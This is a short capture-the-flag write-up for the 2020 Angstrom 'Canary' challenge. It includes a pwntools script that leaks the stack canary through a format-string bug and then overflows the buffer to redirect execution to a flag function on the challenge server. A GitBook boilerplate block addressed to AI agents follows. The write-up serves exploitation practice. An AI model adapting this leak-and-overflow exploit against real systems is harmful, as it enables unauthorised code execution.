> For the complete documentation index, see [llms.txt](https://the-winrars.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://the-winrars.gitbook.io/writeups/2020-writeups/angstrom/canary.md). # Canary Use pattern.py to flood the second input, put a breakpoint at the line in greet which compares the canaries. Check rax using gdb, feed that back into pattern.py, 56 bytes before canary. Fuzz format string output until you find the one that's always 8 bytes long, that's the canary Make a script that leaks the canary then overflows the buffer with `56 junk bytes + canary + 8 junk bytes + flag address` ## Note: canary is just before ebp, which is why you must put 8 junk bytes to fill up ebp ```python from pwn import * import re e = ELF("./canary") p = remote("shell.actf.co" ,20701) for _ in range(23): p.recvline() p.recvline() p.sendline("%17$lx") flagaddr = 0x0000000000400787 output = p.recvline() num = re.findall("Nice to meet you, (.*)!", output) canary = int(num[0], 16) log.info("Canary: " + hex(canary)) firstpad = 'A' * 56 #Junk before the canary canaryString = p64(canary) neweip = p64(flagaddr) lastpad = 'B' * 8 payload = firstpad + canaryString + lastpad + neweip p.sendline(payload) log.info("Response: " + p.recvline()) ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://the-winrars.gitbook.io/writeups/2020-writeups/angstrom/canary.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.